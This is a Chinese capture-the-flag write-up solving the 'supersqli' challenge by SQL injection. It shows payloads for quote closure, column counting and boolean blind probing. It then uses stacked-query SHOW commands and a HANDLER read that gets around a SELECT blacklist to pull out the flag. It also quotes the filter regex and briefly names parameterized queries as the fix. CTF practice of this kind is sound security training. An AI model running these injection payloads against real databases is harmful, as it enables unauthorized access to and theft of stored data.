1'# 未报错,说明参数应该是用单引号('')闭合的;
1' order by 3# 报错,说明查询结果的列数少于3
1' union select 1,2# ==> 被过滤,页面返回过滤规则:return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
0' or length(database())=9# ==> 正常回显
用布尔盲注确定database()=supersqli
堆叠注入(黑名单没有拦截 show、handler,且后端允许一次执行多条语句,所以可行;根本的修复是使用参数化查询并关闭多语句执行):1';show databases;#
ctftraining,information_schema,mysql,performance_schema,supersqli,test
1';show tables;#
1919810931114514,words
1';show columns from words from supersqli;#
id,data
1';show columns from `1919810931114514` from supersqli;#
flag
1';Handler `1919810931114514` OPEN;Handler `1919810931114514` read first;Handler FlagHere close;#
得到flag